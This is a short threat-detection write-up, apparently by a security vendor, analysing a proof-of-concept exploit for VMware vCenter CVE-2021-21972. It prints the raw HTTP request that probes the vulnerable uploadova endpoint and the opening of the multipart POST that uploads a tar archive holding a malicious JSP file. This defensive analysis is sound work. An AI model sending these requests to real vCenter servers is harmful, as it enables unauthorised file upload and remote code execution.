VMware vCenter 6.5 / 7.0 Remote Code Execution exploits.

The Idappcom Threat Detection Team has been working on the recent VMware vCenter 6.5 / 7.0 Remote Code Execution exploits.


These are identified as:

· CVE-2021-21972 – Unauthorized File Upload leading to remote code execution

· CVE-2021-21973 – Unauthorized Server-side Request Forgery

I was able to find a proof of concept script written in python and set about delving into the code to understand how the exploit works.





This was an interesting one to solve because the script first of all looks for a vulnerable target and only if it gets the right response it will carry out the next stage. I had to modify the code to make it think that it had the correct response, this was made easier as the script had several code comments which helped. Once it has checked the target it then goes on to perform an attempt at uploading a .tar file which in this example is an archive of a malicious .jsp file.


This GET request performs a check to see if the target is vulnerable:

GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1

Host: vSphereClient.local

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip, deflate, sdch

Accept-Language: en-US,en;q=0.8

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Connection: keep-alive


This POST request attempts to upload a malicious file.

POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: */*

Connection: keep-alive

Host: vSphereClient.local

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 3223

Content-Type: multipart/form-data; boundary=305be0a4775f442bad1b3a58ea9f3a99


--305be0a4775f442bad1b3a58ea9f3a99

Content-Disposition: form-data; name="uploadFile"; filename="Linux.tar"


References:

https://github.com/NS-Sp4ce

https://swarm.ptsecurity.com/unauth-rce-vmware/